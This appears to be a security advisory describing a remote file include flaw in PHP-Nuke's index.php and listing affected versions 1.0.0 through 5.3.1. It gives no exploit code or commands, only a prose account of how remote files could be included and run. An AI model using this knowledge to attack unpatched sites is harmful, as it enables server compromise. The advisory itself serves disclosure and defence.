Title: PHPNuke Remote Arbitrary File Include Vulnerability
Severity: HIGH
Description:
PHPNuke is a website creation/maintenance tool.
The 'index.php' script has a feature which allows users to include files. While attempts have been made to prevent users from exploiting this to execute arbitrary files on the host running PHPNuke, no such efforts have been made to prevent this feature from being exploited to include files located on a remote server. This issue is due to insufficient input validation on the part of the vulnerable script. Arbitrary code in the attacker's included file may be executed.
As one consequence of this issue, a remote attacker can cause commands to be executed on the shell of the host running vulnerable versions of PHPNuke. Commands will be executed with the privileges of the webserver process and may result in the attacker gaining local access.
It is not known whether this vulnerability affects PostNuke, though the possibility exists.
Affected Products:
- Francisco Burzi PHP-Nuke 1.0.0
- Francisco Burzi PHP-Nuke 2.5.0
- Francisco Burzi PHP-Nuke 3.0.0
- Francisco Burzi PHP-Nuke 4.0.0
- Francisco Burzi PHP-Nuke 4.3.0
- Francisco Burzi PHP-Nuke 4.4.0
- Francisco Burzi PHP-Nuke 4.4.1 a
- Francisco Burzi PHP-Nuke 5.0.0
- Francisco Burzi PHP-Nuke 5.0.1
- Francisco Burzi PHP-Nuke 5.1.0
- Francisco Burzi PHP-Nuke 5.2.0
- Francisco Burzi PHP-Nuke 5.2.0 a
- Francisco Burzi PHP-Nuke 5.3.1
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
